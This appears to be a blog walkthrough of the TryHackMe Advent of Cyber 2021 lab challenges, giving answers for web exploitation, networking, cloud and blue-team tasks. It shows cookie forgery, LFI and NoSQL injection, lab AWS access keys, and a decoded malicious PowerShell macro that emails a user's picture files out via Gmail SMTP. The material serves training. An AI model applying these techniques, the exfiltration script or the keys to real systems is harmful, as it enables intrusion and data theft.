Hey everyone, the Cyber Advent of 2021 has finally arrived and you may play the game at Tryhackme. So let’s open the first day of the advent calendar!

The URL to the room is the following: https://tryhackme.com/christmas

Day 1: Web Exploitation – Save the Gifts

You start with the following view :

Click on “Your Activity”

This will show up the lovely McSkidy

This one is fairly easy, just change the ID to 1

Boom! There’s your first answer

After finding Santa’s account, what is their position in the company?
The Boss! (id=1)

After finding McStocker’s account, what is their position in the company?
Build Manager (id=3)

After finding the account responsible for tampering, what is their position in the company?
Mischief Manager (id=9)

What is the received flag when McSkidy fixes the Inventory Management System?

Day 2: Web Exploitation – ELF HR

Learning Objectives
Understanding the underlying technology of web servers and how the web communicates.
Understand what cookies are and their purpose.
Learn how to manipulate and manage cookies for malicious use.

For this part, I made use of Burp Suite Community Edition. Which can be downloaded via this link: https://portswigger.net/burp/communitydownload

To start with this task you need to open up Burp Suite first.

After opening, you need to click on Proxy as in the screenshot above. You can either set up a proxy in your browser of choice or just click the button: Open Browser

The last option will open a browser based on the Chromium codebase

Navigate to the URL of the task: https://static-labs.tryhackme.cloud/sites/aoc-cookies/

Burp Suite will intercept this request

You’ll need to forward it.

Sign up with some random data

You’ll see the HTTP request and all the parameters within this request

What is the name of the new cookie that was created for your account?

What encoding type was used for the cookie value?

What object format is the data of the cookie stored in?

Manipulate the cookie and bypass the login portal.
This one is not too hard as you can see as you know the current cookie from user-auth. Open up cyberchef and do the following steps.
From Hex: 7b636f6d70616e793a2022546865204265737420466573746976616c20436f6d70616e79222c206973726567697374657265643a2254727565222c20757365726e616d653a2274657374696e67227d

This will give you:

Now copy the output and paste it in the input field AND change the username to admin.

To hex: 7b636f6d70616e793a2022546865204265737420466573746976616c20436f6d70616e79222c206973726567697374657265643a2254727565222c20757365726e616d653a2261646d696e227d

After changing the cookie parameters, the following webpage should load

What is the value of the administrator cookie? (username = admin)

What team environment is not responding?

What team environment has a network warning?

Day 3: Web Exploitation – Christmas Blackout

Using a common wordlist for discovering content, enumerate http://MACHINE_IP to find the location of the administrator dashboard. What is the name of the folder?

In your web browser, try some default credentials on the newly discovered login form for the “administrator” user. What is the password?

Access the admin panel. What is the value of the flag?

Day 4: Web Exploitation – Santa’s running behind

On this day you’ll need to use Burp Suite.

Your burp suite should look like this

After loading the intruder with the password list and starting the intruder attack, you’ll notice that you’ll get different results for all the passwords. The payload cookie gives status 302 which means Found, Hooooooray we’ve got the password!

After logging with the password you’ll see the following (FLAG)

What valid password can you use to access the “santa” account?

What is the flag in Santa’s itinerary?

Day 5: Web Exploitation – Pesky Elf Forum

What flag did you get when you disabled the plugin?

Day 6: Web Exploitation – Patch Management Is Hard

Scan for the web app via nmap: nmap -sC -sV IPHERE, this will give you the following result

Deploy the attached VM and look around. What is the entry point for our web application?

Use the entry point to perform LFI to read the /etc/flag file. What is the flag?

Use the PHP filter technique to read the source code of the index.php. What is the $flag variable’s value?
URL to find out:
Returns the following Base 64: PD9waHAgc2Vzc2lvbl9zdGFydCgpOwokZmxhZyA9ICJUSE17NzkxZDQzZDQ2MDE4YTBkODkzNjFkYmY2MGQ1ZDllYjh9IjsKaW5jbHVkZSgiLi9pbmNsdWRlcy9jcmVkcy5waHAiKTsKaWYoJF9TRVNTSU9OWyd1c2VybmFtZSddID09PSAkVVNFUil7ICAgICAgICAgICAgICAgICAgICAgICAgCgloZWFkZXIoICdMb2NhdGlvbjogbWFuYWdlLnBocCcgKTsKCWRpZSgpOwp9IGVsc2UgewoJJGxhYk51bSA9ICIiOwogIHJlcXVpcmUgIi4vaW5jbHVkZXMvaGVhZGVyLnBocCI7Cj8+CjxkaXYgY2xhc3M9InJvdyI+CiAgPGRpdiBjbGFzcz0iY29sLWxnLTEyIj4KICA8L2Rpdj4KICA8ZGl2IGNsYXNzPSJjb2wtbGctOCBjb2wtb2Zmc2V0LTEiPgogICAgICA8P3BocCBpZiAoaXNzZXQoJGVycm9yKSkgeyA/PgogICAgICAgICAgPHNwYW4gY2xhc3M9InRleHQgdGV4dC1kYW5nZXIiPjxiPjw/cGhwIGVjaG8gJGVycm9yOyA/PjwvYj48L3NwYW4+CiAgICAgIDw/cGhwIH0KCj8+CiA8cD5XZWxjb21lIDw/cGhwIGVjaG8gZ2V0VXNlck5hbWUoKTsgPz48L3A+Cgk8ZGl2IGNsYXNzPSJhbGVydCBhbGVydC1kYW5nZXIiIHJvbGU9ImFsZXJ0Ij5UaGlzIHNlcnZlciBoYXMgc2Vuc2l0aXZlIGluZm9ybWF0aW9uLiBOb3RlIEFsbCBhY3Rpb25zIHRvIHRoaXMgc2VydmVyIGFyZSBsb2dnZWQgaW4hPC9kaXY+IAoJPC9kaXY+Cjw/cGhwIGlmKCRlcnJJbmNsdWRlKXsgaW5jbHVkZSgkX0dFVFsnZXJyJ10pO30gPz4KPC9kaXY+Cgo8P3BocAp9Cj8+

Converting it in CyberChef will give you the following:

So the answer to the question is: THM{791d43d46018a0d89361dbf60d5d9eb8}

Now that you read the index.php, there is a login credential PHP file’s path. Use the PHP filter technique to read its content. What are the username and password?

Based on the info you retained on the converted base64 data previous question, you know there’s an ./includes/creds.php
You can browse to the URL:

A new base64 pops up: PD9waHAgCiRVU0VSID0gIk1jU2tpZHkiOwokUEFTUyA9ICJBMEMzMTVBdzNzMG0iOwo

It gives you the following data when converted:

So the answer to this question is: McSkidy:A0C315Aw3s0m

Use the credentials to login into the web application. Help McSkidy to recover the server’s password. What is the password of the flag.thm.aoc server? 

The web application logs all users’ requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at ./includes/logs/app_access.log.

Day 7: Web Exploitation – Migration Without Security

This CTF contained a MongoDB, I thought it was a bit harder to succeed with this flag. Fortunately, the explanation was quite extensive, it stated that the parameter $ne was injected.

Interact with the MongoDB server to find the flag. What is the flag?

This was not too hard: ssh to the machine, enter MongoDB and select the database that contains flags…

We discussed how to bypass login pages as an admin. Can you log into the application that Grinch Enterprise controls as admin and retrieve the flag?

Thank you Burp Suite!

Once you are logged in, use the gift search page to list all usernames that have guest roles. What is the flag?

Use the gift search page to perform NoSQL injection and retrieve the mcskidy record. What is the details record?

Day 8: Special by John Hammond – Santa’s Bag of Toys

Tip: look at the logs in the folder SantasLaptopLogs for indications.

What operating system is Santa’s laptop running (“OS Name”)?
Microsoft Windows 11 Pro

What was the password set for the new “backdoor” account?

In one of the transcription logs, the bad actor interacts with the target under the new backdoor user account, and copies a unique file to the Desktop. Before it is copied to the Desktop, what is the full path of the original file?

The actor uses a Living Off The Land binary (LOLbin) to encode this file, and then verifies it succeeded by viewing the output file. What is the name of this LOLbin?

Now the fun part begins! Tududuuuuuuum! You’ll need to decode the certificate. CyberChef to the rescue, thank you base64 decryptor!

Drill down into the folders and see if you can find anything that might indicate how we could better track down what this SantaRat really is. What specific folder name clues us in that this might be publicly accessible software hosted on a code-sharing platform?

Additionally, there is a unique folder named “Bag of Toys” on the Desktop! This must be where Santa prepares his collection of toys, and this is certainly sensitive data that the actor could have compromised. What is the name of the file found in this folder? 

What is the name of the user that owns the SantaRat repository?

Explore the other repositories that this user owns. What is the name of the repository that seems especially pertinent to our investigation?

Read the information presented in this repository. It seems as if the actor has, in fact, compromised and tampered with Santa’s bag of toys! You can review the activity in the transcription logs. It looks as if the actor installed a special utility to collect and eventually exfiltrate the bag of toys. What is the name of the executable that installed a unique utility the actor used to collect the bag of toys?

P.S. you only had to look at the transcription.

Following this, the actor looks to have removed everything from the bag of toys, and added in new things like coal, mold, worms, and more!  What are the contents of these “malicious” files (coal, mold, and all the others)?

LOOK closely at the last transcription file.

What is the password to the original bag_of_toys.uha archive? (You do not need to perform any password-cracking or bruteforce attempts)

How many original files were present in Santa’s Bag of Toys?

Day 9: Networking – Where Is All This Data Going

You’ll need Wireshark for this CTF, you can either use the attack box or simply download the pcap file and open it with Wireshark.

In the HTTP #1 – GET requests section, which directory is found on the web server?

What is the username and password used in the login page in the HTTP #2 – POST section?

What is the User-Agent’s name that has been sent in HTTP #2 – POST section?

In the DNS section, there is a TXT DNS query. What is the flag in the message of that DNS query?

It was not that hard: just filter on dns.txt

Follow the UDP stream on number 1060

In the FTP section, what is the FTP login password?

Steps to retrieve the password, filter on FTP

Follow the TCP stream on line 1066. Tadaaaaaaaaa!

In the FTP section, what is the FTP command used to upload the secret.txt file?

If you looked closely the answer was already there in the following-up of the TCP stream.

In the FTP section, what is the content of the secret.txt file?

For this one you need the filter: ftp-data, follow the TCP stream and tadaa there’s the data: AoC Flag: 123^-^321

Day 9 – Networking – Offensive Is The Best Defence

Help McSkidy and run nmap -sT MACHINE_IP. How many ports are open between 1 and 100?
*You could have used the following command as well: nmap MACHINE_IP -p 1-100

What is the smallest port number that is open?

What is the service related to the highest port number you found in the first question?

Now run nmap -sS MACHINE_IP . Did you get the same results? (Y/N)

If you want Nmap to detect the version info of the services installed, you can use nmap -sV MACHINE_IP . What is the version number of the web server?
Apache httpd 2.4.49

By checking the vulnerabilities related to the installed web server, you learn that there is a critical vulnerability that allows path traversal and remote code execution. Now you can tell McSkidy that Grinch Enterprises used this vulnerability. What is the CVE number of the vulnerability that was solved in version 2.4.51?

Search on: https://httpd.apache.org/security/vulnerabilities_24.html

You are putting the pieces together and have a good idea of how your web server was exploited. McSkidy is suspicious that the attacker might have installed a backdoor. She asks you to check if there is some service listening on an uncommon port, i.e. outside the 1000 common ports that Nmap scans by default. She explains that adding -p1-65535 or -p- will scan all 65,535 TCP ports instead of only scanning the 1000 most common ports. What is the port number that appeared in the results now?

What is the name of the program listening on the newly discovered port?

Use following command to find out: nmap -sV -p 20212 MACHINE_IP

Day 11 – Networking: Where Are The Reindeers?

There is an open port related to MS SQL Server accessible over the network. What is the port number?

If the connection is successful, you will get a prompt. What is the prompt that you have received?

We can see four columns in the table displayed above: id, first (name), last (name), and nickname. What is the first name of the reindeer of id 9?

Check the table schedule. What is the destination of the trip scheduled on December 7?

Check the table presents. What is the quantity available for the present “Power Bank”?

There is a flag hidden in the grinch user’s home directory. What are its contents?


Well you know how to open a file 🙂

Some MS SQL Servers have xp_cmdshell enabled. If this is the case, we might have access to something similar to a command prompt.

Day 12 – Networking: Sharing Without Caring

Scan the target server with the IP MACHINE_IP. Remember that MS Windows hosts block pings by default, so we need to add -Pn, for example, nmap -Pn MACHINE_IP for the scan to work correctly. How many TCP ports are open?

In the scan results you received earlier, you should be able to spot NFS or mountd, depending on whether you used the -sV option with Nmap or not. Which port is detected by Nmap as NFS or using the mountd service?

How many shares did you find?

How many shares show “everyone”?

What is the title of file 2680-0.txt?
*Tip: mount the right share and open the file with nano

Also pretty cool that they used the Gutenberg project for this CTF. This is a project where books with expired U.S. copyrights are being digitized.

It seems that Grinch Enterprises has forgotten their SSH keys on our system. One of the shares contains a private key used for SSH authentication (id_rsa). What is the name of the share?

We can calculate the MD5 sum of a file using md5sum FILENAME. What is the MD5 sum of id_rsa?

Day 13: Networking – They Lost The Plan!

Complete the username: p…..

What is the OS version?
10.0.17763 N/A Build 17763

What backup service did you find running on the system?

What is the path of the executable for the backup service you have identified?
“C:\Program Files (x86)\Iperius Backup\IperiusService.exe”

Run the whoami command on the connection you have received on your attacking machine. What user do you have?

What is the content of the flag.txt file?

Make use of a command that you’ve seen earlier, you forgot? No worries, it is type

The Grinch forgot to delete a file where he kept notes about his schedule! Where can we find him at 5:30?

Day 14: Networking – Dev(Insecure)Ops

How many pages did the dirb scan find with its default wordlist?

*Dirb is a Web Content Scanner, or short for directory buster / DirBuster.

How many scripts do you see in the /home/thegrinch/scripts folder?

What are the five characters following $6$G in pepper’s password hash?

Well, the hint is in loot.sh and /etc/shadow (where the passwords are stored)

What is the content of the flag.txt file on the Grinch’s user’s desktop?

use the method of question number 3, it’s quite easy if you know that it’s just a direct path.

Can you answer question 4 using this vector?

Extract the EXIF from this image 😀

I couldn’t get closer than this

Well that’s enough for today seems like I’m not going to extract it :'(

Day 15: Cyber Careers – The Grinch day off

Well, there’s a day off for our little grinch! 🙂 Instead, there’s a quiz with some questions that results with a suitable profile:

Day 16 – Osint: Ransomware Madness

AAAAAAAAAH OSINT <3, the thing I truly love!

OSINT stands for Open Source Intelligence, information that can be obtained from free and public sources.

With this challenge we start with a small Cyrillic text:

You are the responding intelligence officer on the hunt for more information about the infamous “Grinch Enterprises” ransomware gang. 
As a response to the recent ransomware activity from Grinch Enterprises, your team has managed to collect a sample ransomware note. 

!!! ВАЖНЫЙ !!!

Ваши файлы были зашифрованы Гринчем. Мы используем самые современные технологии шифрования.

Чтобы получить доступ к своим файлам, обратитесь к оператору Grinch Enterprises.

Ваш личный идентификационный идентификатор: «b288b97e-665d-4105-a3b2-666da90db14b».

С оператором, назначенным для вашего дела, можно связаться как "GrinchWho31" на всех платформах.

!!! ВАЖНЫЙ !!!

Luckily there’s Google Translate as far as I like learning Russian, I still can’t comprehend all the characters.

What is the operator’s username?

What social media platform is the username associated with?

There are loads of platforms to search for available users on social platforms, for this example I used: https://namevine.com/#/GrinchWho31

What is the cryptographic identifier associated with the operator?

Hint: look at the user profile on twitter.

What platform is the cryptographic identifier associated with?

What is the bitcoin address of the operator?

What platform does the operator leak the bitcoin address on?

What is the operator’s personal email?
[email protected]

What is the operator’s real name?
Donte Heath

Day 17: Cloud – Elf Leaks

First of all this challenge is to find all the details of Shadow IT S3 Bucket, S3 of Amazon AWS. Here are all the services from Amazon AWS:

You’ll start with an image and nothing more than that.

What is the name of the S3 Bucket used to host the HR Website announcement?
What is the message left in the flag.txt object from that bucket?
It’s easy to get your elves data when you leave it so easy to find!
What other file in that bucket looks interesting to you?
What is the AWS Access Key ID in that file?
What is the AWS Account ID that access-key works for?

How to find it? (I made use of the AWS Tools for PowerShell)

Set-AWSCredential `
                 -AccessKey AKIAQI52OJVCPZXFYAOI `
                 -SecretKey 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 `
                 -StoreAs THM
Initialize-AWSDefaultConfiguration -ProfileName THM -Region us-east-1

What is the Username for that access-key?
[email protected]
There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?
What is the database password stored in Secrets Manager?

Day 18: Cloud – Playing With Containers

This challenge introduces you to docker container images and AWS Elastic Container Registry (ECR) – an online registry for public and private container images.

What command will list container images stored in your local container registry?
docker images
What command will allow you to save a docker image as a tar archive?
docker save
What is the name of the file (including file extension) for the configuration, repository tags, and layer hash values stored in a container image?
What is the token value you found for the bonus challenge?

Pretty easy challenge, I think you could have answered the first 3 questions without foreknowledge of Docker.

Day 19: Blue teaming – Something Phishy Is Going On

opening up the .eml file containing the phishing email

Who was the email sent to? (Answer is the email address)
[email protected]

Phishing emails use similar domains of their targets to increase the likelihood the recipient will be tricked into interacting with the email. Who does it say the email was from? (Answer is the email address)
[email protected]

Sometimes phishing emails have a different reply-to email address. If this email was replied to, what email address will receive the email response?
[email protected]

Less sophisticated phishing emails will have typos. What is the misspelled word?

The email contains a link that will redirect the recipient to a fraudulent website in an effort to collect credentials. What is the link to the credential harvesting website?

View the email source code. There is an unusual email header. What is the header and its value?
X-GrinchPhish: >;^)

You received other reports of phishing attempts from other colleagues. Some of the other emails contained attachments. Open attachment.txt. What is the name of the attachment?

What is the flag in the PDF file?

Yeah luckily, heheheh

Day 20: Blue Teaming – What’s the Worst That Could Happen?

Learning Objectives:

In this task, we will learn:

  1. How to identify the file type of a file regardless of file extension
  2. How to find strings in a file
  3. How to calculate hash of a file
  4. Using VirusTotal to perform preliminary analysis of a suspicious file

Open the terminal and navigate to the file on the desktop named ‘testfile’. Using the ‘strings’ command, check the strings in the file. There is only a single line of output to the ‘strings’ command. What is the output?

Check the file type of ‘testfile’ using the ‘file’ command. What is the file type?
EICAR virus test files

Calculate the file’s hash and search for it on VirusTotal. When was the file first seen in the wild?
2005-10-17 22:03:48

On VirusTotal’s detection tab, what is the classification assigned to the file by Microsoft?

Go to this link to learn more about this file and what it is used for. What were the first two names of this file?
ducklin.htm or ducklin-html.htm

The file has 68 characters in the start known as the known string. It can be appended with whitespace characters upto a limited number of characters. What is the maximum number of total characters that can be in the file?

Day 21: Blue Teaming – Needles In Computer Stacks

This day introduced you to YARA. You can find a superb collection of YARA here. This challenge introduced me to an unknown text editing tool for me: SciTe

We changed the text in the string $a as shown in the eicaryara rule we wrote, from X5O to X50, that is, we replaced the letter O with the number 0. The condition for the Yara rule is $a and $b and $c and $d. If we are to only make a change to the first boolean operator in this condition, what boolean operator shall we replace the ‘and’ with, in order for the rule to still hit the file?

What option is used in the Yara command in order to list down the metadata of the rules that are a hit to a file?

What section contains information about the author of the Yara rule?

What option is used to print only rules that did not hit?

Change the Yara rule value for the $a string to X50. Rerun the command, but this time with the -c option. What is the result?

Tip: don’t forget changing the or to and

Day 22 – Blue Teaming: How It Happened

AHHA, here comes CyberChef, the must-have tool in Cyber Security. You’ll start with a document named: Santa_Claus_Naughty_List_2021.doc which you first need to analyze with a second must-have tool: oledump written by a fellow Belgian Cyber Security Researcher named Didier Stevens. This tool helps you with analyzing OLE files. You can imagine an OLE file as an ‘underlying file system’ or like a .ZIP archive. Applications as MS Office with extensions: .doc, .xls, .ppt are known as OLE files. Malevolent persons can manhandle macros to conceal pernicious commands/scripts inside Excel and Word documents.

The key is known as it is being given with this challenge, if this wasn’t given you could have used the following tool: https://github.com/nshadov/xor_key_recovery.

Decoded text:

#Credits goes to @ManiarViral (https://twitter.com/maniarviral) for writing this awesome RAT!

$username="[email protected]"
$smtpServer = "smtp.gmail.com"
$msg = new-object Net.Mail.MailMessage

$smtp = New-Object Net.Mail.SmtpClient($SmtpServer, 587) 

$smtp.EnableSsl = $true

$smtp.Credentials = New-Object System.Net.NetworkCredential($username,$password)

$msg.From = "[email protected]"

$msg.To.Add("[email protected]")

$msg.Body="Your presents have arrived!"

$msg.Subject = "Christmas Wishlist"

$files=Get-ChildItem "$env:USERPROFILE\Pictures\Grinch2021\"

Foreach($file in $files)
$attachment = new-object System.Net.Mail.Attachment -ArgumentList $file.FullName


What is the username (email address of Grinch Enterprises) from the decoded script?
[email protected]

What is the mailbox password you found?

What is the subject of the email?
Christmas Wishlist

What port is the script using to exfiltrate data from the North Pole?

What is the flag hidden found in the document that Grinch Enterprises left behind? (Hint: use the following command oledump.py -s {stream number} -d, the answer will be in the caption).

There is still a second flag somewhere… can you find it on the machine?

Tip for this I didn’t want to type it all over, I made use of my all-time favourite tool: ShareX, which you can get on: https://getsharex.com/

Day 23: Blue Teaming – PowershELlF Magic

On this challenge I was introduced to Full Event Log View tool, never heard about it before, but man what a tool!
The event ids of interest for us in this investigation are 4103 and 4104. 4103 stands for Executing Pipeline and 4104: Execute a Remote Command.

What command was executed as Elf McNealy to add a new user to the machine?

What user executed the PowerShell file to send the password.txt file from the administrator’s desktop to a remote server?

What was the IP address of the remote server? What was the port used for the remote connection? (format: IP,Port),4321

What was the encryption key used to encrypt the contents of the text file sent to the remote server?

What application was used to delete the password.txt file?

What is the date and timestamp the logs show that password.txt was deleted? (format: MM/DD/YYYY H:MM:SS PM)
11/11/2021 7:29:27 PM

What were the contents of the deleted password.txt file?
Mission Control: letitsnowletitsnowletitsnow

Day 24: Post Exploitation – Learning From The Grinch

McSkidy has learned a lot about how Grinch Enterprises operates and wants to prepare for any future attacks from anyone who hates Christmas. From a forensics analysis they did, she noticed that the Grinch Enterprises performed some malicious activities. She wants to perform these on the same machine they compromised to understand her adversaries a little better. Can you follow along and help her prepare for any other attacks?

What is the username of the other user on the system?

What is the NTLM hash of this user?

What is the password for this user?